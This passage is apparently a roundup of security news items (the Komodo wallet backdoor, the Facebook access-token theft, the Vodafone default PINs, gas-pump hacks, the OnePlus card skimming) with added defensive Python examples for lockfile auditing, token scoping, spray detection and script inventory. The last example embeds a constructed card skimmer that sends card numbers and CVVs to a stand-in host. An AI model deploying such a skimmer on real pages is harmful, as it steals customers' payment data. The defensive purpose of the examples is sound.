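Running the module prints the four lines that touch an indicator (the lookalike delivery domain, the C&C IP, the Run-key persistence entry and the opened XLS); the PowerShell line stays silent because the demo indicator set has nothing for it, which is the usual gap an IoC-only scan leaves.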
  11. Are you using Komodo's Agama Wallet to store your KMD and BTC cryptocurrencies? Were your funds also transferred overnight, without your authorisation, to a new address? If yes, don't worry, it's probably safe, and if you are lucky, you will get your funds back. Here's what exactly happened… Komodo, a cryptocurrency project and developer of the Agama wallet, adopted a surprisingly unique way to protect its customers' funds. The company hacked its customers and, without their authorisation, transferred nearly 8 million KMD and 96 Bitcoins from their cryptocurrency wallets to a new address owned by the company. Why? To secure its customers' funds from hackers. This may sound weird, but it's true.
Komodo recently learned about a malicious open source, third-party JavaScript library that the company was using in its Agama Wallet app. The library, named "electron-native-notify," two months ago received an update from its anonymous author, who included a secret backdoor in the new code that was designed to steal the seeds/private keys and other login passphrases of Agama wallet users and send them to a remote server. So, if you have logged in to any version of the Agama wallet downloaded from Komodo's official website or their Android and iOS apps after 13 April this year, it's likely you've had your wallet credentials stolen. The malicious library update in question was initially detected by the security team at the npm JavaScript package repository service, who then informed Komodo of the issue. The npm blog also shared a brief video demonstration showing how the backdoored version of the Agama wallet has been secretly sending a wallet's private seed to a remote server in the background.
After discovering the vulnerability, Komodo decided to use a similar password-stealing technique against its own users to gain access to as many affected wallets as possible and transfer their funds to a safe wallet before the hackers could steal them.
However, it's important to note that not all affected user wallets have been emptied by the company. So, if your wallet has not been swept, you are strongly recommended to immediately move all your funds from Agama to a new address. Komodo also said that the Verus version of its Agama wallet is not affected by this vulnerability and is still completely secure, as it doesn't include the malicious library in question. So, users of the Verus version of the Agama wallet are not affected by the security incident. Source
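A first-line check against this kind of dependency backdoor is to gate builds on the lockfile: refuse known-bad name/version pairs and refuse any entry that carries no integrity hash, so a republished tarball cannot slip in under the same version. The script below is an added example, not Komodo's or npm's tooling. The denylisted version number is an assumption for the demo (the post above does not give one), and both lockfiles are constructed inline.

```python
"""Audit an npm lockfile for a known-bad dependency version and for entries
with no integrity hash. Added example, not Komodo's or npm's tooling. The
denylisted version and the lockfile contents are assumptions for the demo."""
import json

# Constructed lockfile, lockfileVersion 1 layout (nested "dependencies").
SAMPLE_LOCKFILE = json.dumps({
    "name": "demo-wallet",
    "lockfileVersion": 1,
    "dependencies": {
        "electron-native-notify": {
            "version": "1.1.6",
            "resolved": "https://registry.npmjs.org/electron-native-notify/-/electron-native-notify-1.1.6.tgz",
            "integrity": "sha512-ZmFrZS1oYXNoLWZvci1kZW1v",
        },
        "some-framework": {
            "version": "2.0.0",
            "resolved": "https://registry.npmjs.org/some-framework/-/some-framework-2.0.0.tgz",
            "integrity": "sha512-YW5vdGhlci1mYWtlLWhhc2g",
            "dependencies": {
                "unpinned-helper": {  # no "integrity": nothing ties this to a tarball
                    "version": "0.3.1",
                    "resolved": "https://example.invalid/unpinned-helper-0.3.1.tgz",
                },
            },
        },
    },
})

# Same tree in the lockfileVersion 2/3 layout (flat "packages" keyed by path).
SAMPLE_LOCKFILE_V2 = json.dumps({
    "name": "demo-wallet",
    "lockfileVersion": 2,
    "packages": {
        "": {"name": "demo-wallet"},
        "node_modules/electron-native-notify": {
            "version": "1.1.6", "integrity": "sha512-ZmFrZS1oYXNoLWZvci1kZW1v"},
        "node_modules/some-framework": {
            "version": "2.0.0", "integrity": "sha512-YW5vdGhlci1mYWtlLWhhc2g"},
        "node_modules/some-framework/node_modules/unpinned-helper": {"version": "0.3.1"},
    },
})

# (name, version) pairs known to be malicious. The version here is assumed.
DENYLIST = {("electron-native-notify", "1.1.6")}


def iter_packages(lock):
    """Yield (name, entry) for every package in a v1 (nested) or v2/v3 (flat) lockfile."""
    if "packages" in lock:
        for path, entry in lock["packages"].items():
            if path:  # "" is the root project, not a dependency
                yield path.split("node_modules/")[-1], entry
        return
    stack = list(lock.get("dependencies", {}).items())
    while stack:
        name, entry = stack.pop()
        yield name, entry
        stack.extend(entry.get("dependencies", {}).items())


def audit_lockfile(text, denylist=DENYLIST):
    """Return denylisted (name, version) hits and names with no integrity hash."""
    lock = json.loads(text)
    denied, unpinned = [], []
    for name, entry in iter_packages(lock):
        version = entry.get("version")
        if (name, version) in denylist:
            denied.append((name, version))
        if not entry.get("integrity"):
            unpinned.append(name)
    return {"denied": sorted(denied), "unpinned": sorted(unpinned)}


if __name__ == "__main__":
    for label, text in (("v1", SAMPLE_LOCKFILE), ("v2", SAMPLE_LOCKFILE_V2)):
        print(label, audit_lockfile(text))
```

Both layouts give the same verdict, which is the point of walking the tree rather than grepping: the unpinned package sits two levels down, where a flat search for the top-level names would never look. In CI, a non-empty `denied` or `unpinned` list should fail the build.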
  12. Facebook revealed more details about how hackers exploited three distinct bugs to get the ability to control up to 50 million users’ accounts. On Friday, Facebook revealed that hackers broke into the company’s servers and potentially stole the data of up to 50 million people. The social network forced 90 million people—around 50 million victims plus an additional 40 million that may have been affected, according to the company—to log out and log back in again. That’s because the hackers stole their “access tokens,” a sort of digital key that Facebook creates when you log in and that allows you to stay logged in when, for example, the Facebook mobile app wants to open another part of Facebook inside a browser (this might occur when you click a link). An access token doesn’t include a user’s password, but since it allows a user to stay logged in, having an access token means you can completely control the account. “Parts of our site use a mechanism called single sign-on that creates a new access token,” Guy Rosen, Facebook’s vice president of product management, told reporters on a press call. “The way this works is: let’s say I’m logged into the Facebook mobile app and it wants to open another part of Facebook inside a browser, what it will do is use that single sign-on functionality to generate an access token for that browser, so that means you don’t have to login again on that window.” The hackers took advantage of three distinct vulnerabilities chained together in order to steal the tokens, Rosen said. The vulnerabilities have existed since at least July 2017 and were related to Facebook’s “View As” tool, which allows you to view your own profile as if you were someone else (this is a privacy feature—it allows you, for example, to check whether your ex, or grandma, or anyone you want to hide things from can see certain posts on your page). If you haven’t used the feature before, it can be hard to visualize or imagine.
Basically, let’s say you wanted to hide some wall posts from your nemesis John. You can change your Facebook privacy settings to allow John to only see certain posts. Then, to check that the changes to your privacy settings actually worked, you can use the View As feature to look at your profile as if you were John. You’re not actually John, of course, and you don’t have access to his account—it’s just a simulation. But this chain of bugs would have allowed you, if you were a hacker, to acquire John’s access token, and then log into his account using that token, therefore taking full control of his account. “It’s important to say: the attackers could use the account as if they were the account holder,” Rosen said. The first bug, Rosen explained, caused a video uploader to show up on View As pages “on certain kinds of posts encouraging people to post happy birthday greetings.” Normally, the video uploader should not have shown up. The second bug caused this video uploader to generate an access token that had permission to log into the Facebook mobile app, which is not how this feature “is intended to be used,” according to Rosen. The final bug, Rosen explained, was that when the video uploader showed up as part of the View As feature, it generated a new access token not for the user, but for the person they were pretending to be—essentially giving the person using the View As feature the keys to access the account of the person they were simulating. In the example we gave above, this would not only have allowed you to look at John’s profile using the View As John feature, but it also would have generated an access token allowing you to log in to and take over John’s account. “It was the combination of those three bugs that became a vulnerability. Now, this was discovered by attackers,” Rosen said.
“Those attackers, in order to run the attack, needed not just to find this vulnerability, but they needed to get an access token and then to pivot that access token to other accounts and then look up other users in order to get further access tokens.” Rosen said he believed that this was a relatively sophisticated attack, especially to get up to 50 million different logins: “This is a complex interaction of multiple bugs that happened together,” he said. “We did see this attack being used at a fairly large scale, which is how we discovered it and began investigating and found the attack that was happening,” Rosen said. “We don’t know exactly how accounts were misused so far.” Ryan Stortz, a security researcher at Trail of Bits, told Motherboard that Facebook should’ve had the ability to find this bug before the hackers did. “Facebook has a whole API filter that they stream all account changes (writes) through that should have caught this,” Stortz told Motherboard in an online chat. “I don’t know what the flaw was, but if they took over Zuck’s account, that’s bad and they should have had a write filter to prevent that.” But a former Facebook security engineer said this was not a trivial bug to find. “It sounds like a hell of a find, the ‘View As’ code has been around for a while so I'm not surprised it had some bugs,” Zac Morris, who worked in Facebook’s security division from 2012 until 2016, told Motherboard. “But pivoting off that into full access tokens is pretty impressive.” Morris added that “as someone who was affected I'm mostly interested in who was doing it and why, [because] that’s a $30,000 bug bounty report, so they must've had some better way to monetize it which is a little scary.” Rosen said that the hackers did not steal passwords, so unless you’ve already been forced to log out, you should not be affected and users don’t need to change their passwords. Facebook said it has temporarily disabled the View As feature. Source
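The three bugs Rosen describes come down to one token-minting mistake: a component running while user A previews A's own profile "as" user B minted a token for B, and minted it with enough scope to log into the full app. The following is an added, illustrative example and not Facebook's code; the token format, the audience names and the users are assumptions. It puts the vulnerable minting path next to a hardened one and shows which of the two lets the previewing user act as the person being impersonated.

```python
"""Toy model of the View-As token bug: a preview feature must mint tokens for
the real session owner, scoped to the preview, never for the impersonated
user. Added example, not Facebook's code; names and format are assumptions."""
import base64
import hashlib
import hmac
import json
import secrets

SIGNING_KEY = secrets.token_bytes(32)  # per-process demo key


def mint_token(subject, audience, key=SIGNING_KEY):
    """HMAC-signed bearer token: who it acts as (sub) and where it is valid (aud)."""
    claims = json.dumps({"sub": subject, "aud": audience}, sort_keys=True).encode()
    body = base64.urlsafe_b64encode(claims).decode()
    sig = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{sig}"


def verify_token(token, key=SIGNING_KEY):
    """Return the claims if the signature checks out, else None."""
    body, _, sig = token.rpartition(".")
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None
    return json.loads(base64.urlsafe_b64decode(body))


def can_act_as(token, user, audience):
    """True if the bearer of `token` may act as `user` inside `audience`."""
    claims = verify_token(token)
    return claims is not None and claims["sub"] == user and claims["aud"] == audience


def uploader_token_vulnerable(session_user, view_as_user):
    """Bugs 2 and 3 together: full-app audience, minted for the impersonated user.
    `session_user` is ignored, which is exactly the flaw."""
    return mint_token(subject=view_as_user, audience="mobile-app")


def uploader_token_hardened(session_user, view_as_user):
    """Subject is the real session owner; audience is narrowed to the preview
    surface, so even a leaked token cannot open the mobile app."""
    return mint_token(subject=session_user, audience="view-as-preview")


if __name__ == "__main__":
    bad = uploader_token_vulnerable("attacker", "john")
    good = uploader_token_hardened("attacker", "john")
    print("vulnerable token takes over john:", can_act_as(bad, "john", "mobile-app"))
    print("hardened token takes over john:  ", can_act_as(good, "john", "mobile-app"))
    print("hardened token as attacker/preview:", can_act_as(good, "attacker", "view-as-preview"))
```

The pivot Rosen describes (use one stolen token to look up friends and mint more) works only because the vulnerable path trusts `view_as_user` as the subject. Binding the subject to the authenticated session and the audience to the preview removes both halves: the minted token is for you, and it cannot be replayed against the mobile app.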
  13. from the the-times-we-live-in dept We live in such ridiculous times. The ongoing silly narrative over supposed "political bias" by tech companies is causing all sorts of stupid follow-on effects. For instance, Microsoft has now asked the Federal Election Commission for an advisory opinion stating that offering its enhanced security features -- known as AccountGuard -- to any political campaign won't be deemed an unfair campaign contribution. At first blush, it seems crazy that they would even need to do so, but it's really a product of the era that we live in. As you may recall, part of the issue around the whole Stormy Daniels / Donald Trump fight is the question of whether or not Trump lawyer Michael Cohen paying her off to stay quiet was an illegal campaign contribution, because it was money paid specifically with the intent to aid a particular candidate (in this case, Trump) in his election campaign. Indeed, John Edwards got caught up in something quite similar in the 2008 campaign, in having someone pay off his mistress to keep her quiet. And some have argued that the case against Trump is significantly stronger than the one against Edwards (in which he was indicted, but after an acquittal on one charge and a hung jury on the rest, the DOJ decided to drop the case). But the key issue under election law is that the rules apply to payments (or in-kind contributions) "for the purpose of influencing an election." And, in Microsoft's case, it highlights in its letter that it is offering this security service to all candidates regardless of their party positions, and thus is not trying to influence elections one way or the other, just to protect politicians from getting hacked. It seems fairly obvious that this shouldn't even be an issue, but seeing as I'm not an expert in campaign finance, I reached out to former FEC chair Ann Ravel to see if I was missing something.
She agreed that it was unlikely that Microsoft doing this would be seen as a violation of the law: "I am fairly confident that the FEC will conclude that Microsoft's proposed free service to 'election sensitive' customers is permissible and not a prohibited in-kind contribution. Microsoft has made a good case that the service will not only be non-partisan but is in the company's own business interests, as well as their social obligation." But another reason why Microsoft may have asked the FEC for an opinion is that lately we've been seeing more and more people claiming -- somewhat ridiculously -- that the silly debate over "political bias" on the platforms also involves illegal campaign contributions. I believe that this is intellectually dishonest partisan gamesmanship, simply trying (weakly) to take the claims about the Daniels payment and play whataboutism on a grand scale. Indeed, at least one candidate has even filed an FEC complaint over being banned by Twitter: and that's Paul Nehlen, who self-describes as a "pro-white candidate" and whose bigoted views are extreme enough that even Steve Bannon and others in the Trump camp have washed their hands of Nehlen. Nehlen's FEC complaint was put together by lawyer Marc Randazza, who many of you are familiar with. Frankly, I believe this is not his best work. It relies heavily on the debunked article by Vice that incorrectly claimed that Twitter was "shadowbanning conservatives" based on their political views. The reality was that Twitter was not shadowbanning (it was merely having some users not show up in autocomplete) and it wasn't based on their political views. But the complaint doesn't acknowledge any of that, and insists that the article is evidence of Twitter trying to silence Nehlen's side of the "debate."
I raised some fairly skeptical questions about the complaint with Randazza over email, who responded that he believes that "Twitter and other platforms are attempting to 'meddle in' elections" and stated, "Once they figure out who they can ban and who they can't, just watch for it." No offense to Marc, but that sounds fairly paranoid and devoid of any actual evidence. The discussions I've seen from platforms suggest that they are actually bending over backwards to appear "balanced" in how they handle political candidates from all across the political spectrum, perhaps to a ridiculous degree, out of fear of backlash from the supporters of those politicians. In Nehlen's case, his tweets were so far over the top and so far beyond what Twitter's terms of service allowed that they finally got rid of him. Again, due to my lack of experience with campaign finance laws, I ran the Nehlen complaint by former FEC Chair Ravel, who also felt that it stood little chance before the FEC, and suggested that the complaint misrepresented campaign finance law: And while the Nehlen complaint bends over backwards to argue that "Twitter is the new debate platform," it seems like a huge stretch to argue that just because everyone shows up on Twitter to debate, this is the same as Twitter "staging" a debate. Ravel also sees some other massive hurdles to Nehlen's complaint: In short, this seems unlikely to get very far. Though, given how long these things take, it may be years before we get official rulings on these issues. But, seeing as people are now trying to use campaign finance law as a weapon against anything related to politics, I guess we shouldn't be all that surprised to see Microsoft feel the need -- and you can almost hear the giant sigh coming from the legal team in Redmond -- to first seek an advisory ruling to make it clear that what they're doing in protecting candidates is okay. Source
  14. Hackers are behind bars for stealing $30,000 from accounts, but Vodafone wants their victims to pay the tab. If you use a simple, easy-to-guess password such as "QWERTY" or "1234," you might pay for your mistake by having someone access your online accounts without permission -- and you may also find yourself paying out for subsequent damages and lost funds. That is, if Vodafone reportedly has its way. Recently, a court in Teplice, Czech Republic, sentenced two individuals to jail for compromising the accounts of Vodafone customers in order to make fraudulent mobile payments. According to local media outlet idnes.cz, the two men were able to access customer accounts by testing out "1234" as a password, enabling them to order new SIM cards without permission, which were then picked up at local branches. These SIM cards were activated and used in mobile phones without any further authentication, as the attackers already knew the phone number and name associated with each compromised account. Once active, the SIMs were used to send premium SMS messages to gambling services. The publication says that 667,000 crowns were stolen through the scheme, which began in April 2017. This equates to roughly $30,000. Some customers impacted by the breach say that the "1234" password was set by default by Vodafone. It appears that access to the online self-service shop which the attackers exploited is automatic, but customers may not have been aware of the service at all at sign-up. The men have been sentenced to three and two years in jail, respectively. Vodafone, however, is reportedly refusing to pay up and wants the victims to cover the damages. According to idnes.cz, Vodafone has argued the customers are at fault, as they are responsible for the strength of their password.
A Vodafone spokesperson told the publication that the default, weak password was not an automatic element; rather, employees were able to set up an account with "1234" if customers could not decide on their password choice in-store -- but they would have been warned to change it to something stronger later. A number of victims have denied knowing the self-service shop existed at all until the time of the theft. The publication reports that some account holders impacted by the scheme have received debt collectors at their door to recoup lost funds. "If the account was misused by an unknown offender, the correct procedure is that the customer will report the situation to the Czech police and file a criminal complaint," the Vodafone spokesperson said. "Unfortunately, we cannot compensate for the charged amount." Jiri Kropac, the head of Threat Detection Labs at ESET, tested the portal on behalf of Bleeping Computer and confirmed that the portal's inherent security is poor, as a password can only consist of four to six numbers. This is not difficult to brute-force. Vodafone's apparent stance on the robbery is a dangerous one -- but it is not the first time such a mindset has been raised. Former UK Met Police chief Sir Bernard Hogan-Howe, when he was in his previous role, said that customers who become victims of financial fraud should not be compensated by banks. Some banks argue that if a payment is made voluntarily, they should not be held responsible for such losses. In 2015, Vodafone experienced a data breach which led to the theft of sensitive information belonging to 1,827 UK customers. The telecoms giant said the cyberattack was not due to vulnerable company systems, but rather, email address and password credentials were taken "from an unknown source" outside of Vodafone. ZDNet has reached out to Vodafone and will update if we hear back. Source
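Two checks follow from the portal described above: a password-policy gate that would have refused the four-to-six-digit PINs the portal accepted, and a detector for the pattern the two men used, one guess tried across many accounts, which per-account lockout never sees. The code below is an added example, not Vodafone's or the publication's; the log format and thresholds are assumptions and the authentication log is constructed.

```python
"""Password-policy gate and password-spray detector for a self-service portal.
Added example, not Vodafone's code; the log format, the thresholds and the
log lines are assumptions constructed for the demo."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)

# Constructed authentication log: one source tries the same guess across
# six accounts in a few seconds; a second source is one customer mistyping.
SAMPLE_LOG = """\
2017-04-03T10:00:01Z src=203.0.113.7 user=cust1001 result=FAIL
2017-04-03T10:00:02Z src=203.0.113.7 user=cust1002 result=OK
2017-04-03T10:00:03Z src=203.0.113.7 user=cust1003 result=FAIL
2017-04-03T10:00:04Z src=203.0.113.7 user=cust1004 result=OK
2017-04-03T10:00:05Z src=203.0.113.7 user=cust1005 result=FAIL
2017-04-03T10:00:06Z src=203.0.113.7 user=cust1006 result=FAIL
2017-04-03T10:05:00Z src=198.51.100.9 user=cust2001 result=FAIL
2017-04-03T10:05:30Z src=198.51.100.9 user=cust2001 result=OK
"""


def password_policy_ok(password):
    """Reject what the portal accepted: short, single-class (all-digit) secrets.
    Requires at least 8 characters drawn from at least two character classes."""
    if len(password) < 8:
        return False
    classes = sum([
        any(c.isdigit() for c in password),
        any(c.isalpha() for c in password),
        any(not c.isalnum() for c in password),
    ])
    return classes >= 2


def parse(log_text):
    """Parse log lines into dicts; malformed lines are skipped, not fatal."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return events


def detect_spray(log_text, window=timedelta(minutes=10), min_accounts=5):
    """Flag sources touching >= min_accounts distinct accounts inside `window`.
    Successes count as well as failures: a spray shows as breadth, and with a
    default PIN many of the guesses succeed, so a failure-only rule misses it."""
    by_src = defaultdict(list)
    for e in parse(log_text):
        by_src[e["src"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        lo = 0
        for hi in range(len(evs)):          # sliding window over one source
            while evs[hi]["ts"] - evs[lo]["ts"] > window:
                lo += 1
            span = evs[lo:hi + 1]
            users = {e["user"] for e in span}
            if len(users) >= min_accounts and len(users) > alerts.get(src, {}).get("accounts", 0):
                alerts[src] = {
                    "accounts": len(users),
                    "compromised": sorted({e["user"] for e in span if e["result"] == "OK"}),
                }
    return alerts


if __name__ == "__main__":
    for pw in ("1234", "123456", "correct-horse-7"):
        print(f"policy_ok({pw!r}) = {password_policy_ok(pw)}")
    for src, info in detect_spray(SAMPLE_LOG).items():
        print(src, info)
```

The detector reports the spraying source together with the accounts on which the guess worked, which is the list the carrier would need for forced resets; the single customer retrying their own PIN is not flagged.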
  15. When we talk about hacking, we usually think of a massive cyber attack on a financial institution. But, from recent hacks and data breach incidents, it seems the hackers have changed their targets. Recently, some crooks tried a not entirely new (and somewhat weird) trick to achieve their goal. These hackers hacked a US gas station to pilfer 600 gallons of fuel worth $1,800, and did so brazenly in the middle of the day.
Hackers Hacked A Detroit Gas Station
As initially disclosed on Wednesday, individuals hacked a Detroit, Michigan gas station to steal 600 gallons of gas. The Marathon gas station suffered this attack on June 23, 2018, when two men reached the pump for fuel. Reportedly, they took control of the pump at the gas station through a remote device, which prevented the clerk on duty from blocking the hack from his system. According to Fox2Detroit, the clerk, Aziz Awadh, said about the incident, “I tried to stop it here from the screen but the screen’s not working. I tried to stop it from the system; nothing working.” Awadh said he was able to shut down the pump only after he found the emergency kit. He then called the police. However, by then, the hackers had managed to drain a large volume of fuel.
Police Ask For Help To Identify Culprits
According to the initial police investigation, the hackers used a unique remote device to take over the pump. The hackers are believed to have had 10 vehicles, which they filled completely within 90 minutes. However, as the security cameras were working perfectly, those hackers have been captured in the video recording. While the investigation into the matter continues, the Detroit Police Department has requested that the public inform them if anyone gets to know anything about the thieves. < Here >
  16. Alt-currency's value tumbles amid malicious mining mishaps The Verge cryptocurrency has seen its value drop by 25 per cent after hackers exploiting a bug in the alt-coin's software forced its developers to hit the reset button and hard-fork the currency. Programmers on Wednesday confirmed that the fun-bux had been on the receiving end of a "small hash attack" that caused its value to drop from $0.07 to $0.05 per XVG. The developers claimed they had cleared up what was portrayed as a minor hiccup.
  17. Authorities in Russia have broken up a widespread scheme involving dozens of gas-station employees who used software programs on electronic gas pumps to con customers into paying for more fuel than was actually pumped into their tank. The scam shorted customers between 3 and 7 percent per gallon of gas pumped. On Saturday, the Russian Federal Security Service (FSB) arrested hacker Denis Zayev in Stavropol, Russia on charges that he created several software programs designed to swindle gas customers, according to multiple Russian media reports. The software was found only on gas stations located predominantly throughout the south of Russia. The FSB did not return an email request for comment on this story. Zayev is accused of developing the software programs and selling them to rogue gas-station employees. Under the arrangement, both gas-station employees and Zayev received a cut of the money customers overpaid for gas. According to the FSB, the crime earned Zayev and gas station employees “hundreds of millions of rubles.” A translated report from news source Rosbalt said the malicious software was nearly impossible to detect by local inspectors and by oil companies that monitor gasoline inventory remotely. According to the report, not only did pumps display false data, but so did cash registers and back-end systems. In addition, Zayev’s software was able to cloak sales data tied to the sale of a station’s illicit surplus gasoline. It’s unclear what tipped Russian authorities off to the scam. Hackers targeting gas stations isn’t new. In 2014, New York state authorities charged 13 men for using Bluetooth-enabled skimmers to steal more than $2 million from customers at gas stations across the Southern United States between 2012 and 2013. A 2015 Black Hat presentation by researchers Kyle Wilhoit and Stephen Hilt also highlighted the dangers of a growing number of internet-exposed gas pump monitoring systems in the U.S.
They warned exposed SCADA systems could allow malicious actors to carry out DDoS attacks against pumps, register incorrect fill data and damage engines by manipulating pumps to serve diesel fuel instead of unleaded. Article
  18. A user at Resetera.com has announced that a hack for PlayStation 4 firmware 4.05 (PS4 4.05) is now available, and hence the opportunity for targeting the highly sought-after Sony device is ripe. As per DanteLinkX, the user who posted about the hack, it is possible to load or dump PS4 files into ‘.pkg’ format and then load them on firmware version 4.05. Moreover, there are multiple dumps that are compatible with version 4.05 PS4 games, and these are being distributed widely on the internet. “Supposedly a hack for firmware 5.01 is on the way too,” said DanteLinkX. This new hack has been dubbed PS4HEN. It has the capability of modifying the console at the software level to allow homebrew applications to be executed and run. In simple words, it converts the regular PS4 console into a developer’s kit. Hackers used PS4HEN to emulate PS2 games so as to boost the PS4 library. Perhaps people are now playing pirated PS4 games too, on compromised consoles running version 4.05, for instance Doom VFR and Dead Rising 4. Furthermore, the PKG Kitchen tool allows games like GTA V, Uncharted 4 and similar others to be dumped online for users to play. However, the process of playing pirated games is not only complicated but detrimental to the machine itself. There are a number of free games available on PSN, so you can opt for them, but if you really intend to get your console hacked then we suggest that you wait for more information on the hacking tools and the consequences of their usage. A statement is due to be released by Sony regarding this issue, but you need to remember that hacking a PS4 will instantly render its warranty void and it would become impossible to sell your machine to local vendors. Even if you try to remove the hack, you will be facing compatibility issues. You can learn more about the hack by following this link. https://www.hackread.com/playstation-4-hacked-to-run-ps2-emulation-homebrew-software/
  19. On Dec. 22, 2017, the Royal Canadian Mounted Police (RCMP) charged Jordan Evan Bloom of Thornhill, Ontario for trafficking in identity information, unauthorized use of a computer, mischief to data, and possession of property obtained by crime. Bloom is expected to make his first court appearance today. According to a statement from the RCMP, “Project Adoration” began in 2016 when the RCMP learned that LeakedSource.com was being hosted by servers located in Quebec. “This investigation is related to claims about a website operator alleged to have made hundreds of thousands of dollars selling personal information,” said Rafael Alvarado, the officer in charge of the RCMP Cybercrime Investigative Team. “The RCMP will continue to work diligently with our domestic and international law enforcement partners to prosecute online criminality.” In January 2017, multiple news outlets reported that unspecified law enforcement officials had seized the servers for Leakedsource.com, perhaps the largest online collection of usernames and passwords leaked or stolen in some of the worst data breaches — including three billion credentials for accounts at top sites like LinkedIn and Myspace. LeakedSource in October 2015 began selling access to passwords stolen in high-profile breaches. Enter any email address on the site’s search page and it would tell you if it had a password corresponding to that address. However, users had to select a payment plan before viewing any passwords. The RCMP alleges that Jordan Evan Bloom was responsible for administering the LeakedSource.com website, and earned approximately $247,000 from trafficking identity information. A February 2017 story here at KrebsOnSecurity examined clues that LeakedSource was administered by an individual in the United States. 
Multiple sources suggested that one of the administrators of LeakedSource also was the admin of abusewith[dot]us, a site unabashedly dedicated to helping people hack email and online gaming accounts. That story traced those clues back to a Michigan man who ultimately admitted to running Abusewith[dot]us, but who denied being the owner of LeakedSource. The RCMP said it had help in the investigation from The Dutch National Police and the FBI. The FBI could not be immediately reached for comment. Article
  20. If you are a OnePlus customer and bought their products through their website between mid-November 2017 and January 11, 2018, chances are that your credit card data has been stolen. OnePlus, the Chinese smartphone manufacturer, has acknowledged that its website was hacked and breached by hackers who stole credit card data belonging to around 40,000 customers.
Background
On January 15th, 2018, HackRead published an in-depth report on OnePlus customers complaining about credit card fraud and claiming that their cards had been used to make purchases without their knowledge and permission after shopping through the OnePlus website (OnePlus.net) between October and December 2017. In reply, OnePlus had denied that their checkout page was hacked or breached. However, according to Fidus InfoSecurity Limited, a British cybersecurity firm, the OnePlus checkout was using the Magento eCommerce platform, which was in the news lately for containing a critical bug that could be exploited to take over any website. Remember, the same bug was used by a Coinhive user to hack the BlackBerry mobile website and place Monero cryptocurrency mining code. Furthermore, Fidus pointed out several loopholes in the OnePlus website and concluded that there was a chance the OnePlus website could be compromised by placing JavaScript and modifying the Cc.php file, which requires shell access to the server and indicates a serious compromise.
OnePlus admits it suffered data breach
Earlier today (January 19th, 2018), according to the official forum post by OnePlus staff member Mingyu, the company acknowledged that it did suffer a hack attack in which hackers injected a malicious script into the company’s payment page code and siphoned off credit card data. One of our systems was attacked, and a malicious script was injected into the payment page code to sniff out credit card information from customers who were entering the data on OnePlus.net.
However, OnePlus maintains that customers who used saved credit cards or paid via “Credit Card via PayPal,” and those who bought OnePlus products via PayPal, should not be affected. OnePlus also sent emails to potentially affected customers informing them that their credit card data, including card numbers, expiry dates, and security codes, was stolen between mid-November 2017 and January 11, 2018. Moreover, the company has contacted law enforcement authorities in the regions it operates in and offered free credit monitoring to affected customers. “We cannot apologize enough for letting something like this happen. We are eternally grateful to have such a vigilant and informed community, and it pains us to let you down.” “We are working with our current payment providers to implement a more secure credit card payment method, as well as conducting an in-depth security audit. All these measures will help us prevent such incidents from happening in the future,” said Mingyu. source
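A script injected into the payment page, as described above, is invisible to the merchant until customers complain unless the page's script inventory is watched. The code below is an added example, not OnePlus's or Fidus's tooling: it inventories the `<script>` tags on a checkout page, diffs them against a signed-off baseline, and turns that baseline into a `script-src` directive with inline hashes so the browser itself refuses any script the baseline does not list. The page HTML, the baseline, the hostnames and the appended skimmer are all constructed for the demo.

```python
"""Inventory checkout-page scripts, diff against a baseline, and derive a CSP.
Added example, not OnePlus's code; page, baseline and hostnames are constructed."""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptInventory(HTMLParser):
    """Collect external script URLs and SHA-256 hex digests of inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []  # start capturing an inline body

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            body = "".join(self._buf).strip().encode()
            self.inline.append(hashlib.sha256(body).hexdigest())
            self._buf = None


def inventory(html):
    p = ScriptInventory()
    p.feed(html)
    p.close()
    return {"external": p.external, "inline": p.inline}


def diff_against_baseline(html, baseline):
    """Scripts present on the page that the baseline never approved."""
    inv = inventory(html)
    return {
        "unknown_external": sorted(set(inv["external"]) - set(baseline["external"])),
        "unknown_inline": sorted(set(inv["inline"]) - set(baseline["inline"])),
    }


def csp_header(baseline):
    """script-src admitting only the baseline: same-origin files, the origins of
    external scripts, and the exact hashes of approved inline bodies."""
    sources = ["'self'"]
    for src in baseline["external"]:
        u = urlsplit(src)
        if u.scheme and u.netloc:
            sources.append(f"{u.scheme}://{u.netloc}")
    for hexdigest in baseline["inline"]:  # CSP wants base64 of the raw digest
        sources.append("'sha256-" + base64.b64encode(bytes.fromhex(hexdigest)).decode() + "'")
    return "script-src " + " ".join(sources)


LEGIT_INLINE = "window.checkoutConfig = {currency: 'USD'};"
BASELINE = {
    "external": ["/static/js/checkout.js", "https://cdn.example/pay.js"],
    "inline": [hashlib.sha256(LEGIT_INLINE.encode()).hexdigest()],
}

CLEAN_PAGE = f"""<html><body>
<script src="/static/js/checkout.js"></script>
<script src="https://cdn.example/pay.js"></script>
<script>{LEGIT_INLINE}</script>
<form id="payment"><input name="cc_number"><input name="cvv"></form>
</body></html>"""

# Same page with a constructed skimmer appended: the shape of what an edit to a
# server-side template leaves behind. The collector host is a reserved name.
SKIMMED_PAGE = CLEAN_PAGE.replace("</body>", """<script>
document.getElementById('payment').addEventListener('submit', function () {
  new Image().src = 'https://collector.invalid/?d=' + encodeURIComponent(
    document.querySelector('[name=cc_number]').value + '|' +
    document.querySelector('[name=cvv]').value);
});
</script></body>""")

if __name__ == "__main__":
    print("clean  :", diff_against_baseline(CLEAN_PAGE, BASELINE))
    print("skimmed:", diff_against_baseline(SKIMMED_PAGE, BASELINE))
    print(csp_header(BASELINE))
```

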